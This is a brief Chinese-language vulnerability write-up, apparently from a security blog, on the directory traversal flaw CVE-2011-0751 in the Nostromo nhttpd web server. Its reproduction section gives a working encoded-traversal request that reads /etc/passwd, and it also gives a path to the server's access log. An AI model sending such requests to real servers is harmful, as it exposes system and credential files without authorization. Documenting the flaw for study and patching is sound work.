nhttpd 目录遍历 (CVE-2011-0751)
·
一、漏洞概述
Nostromo nhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。
nhttpd(又名 Nostromo 网络服务器)中的目录遍历漏洞允许远程攻击者通过 URI 中的 ..%2f(编码点点斜线)执行任意程序或读取任意文件,在其根目录下访问/..%2flogs/access_log,即可查看log。
二、访问页面

三、漏洞复现
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd

更多推荐

所有评论(0)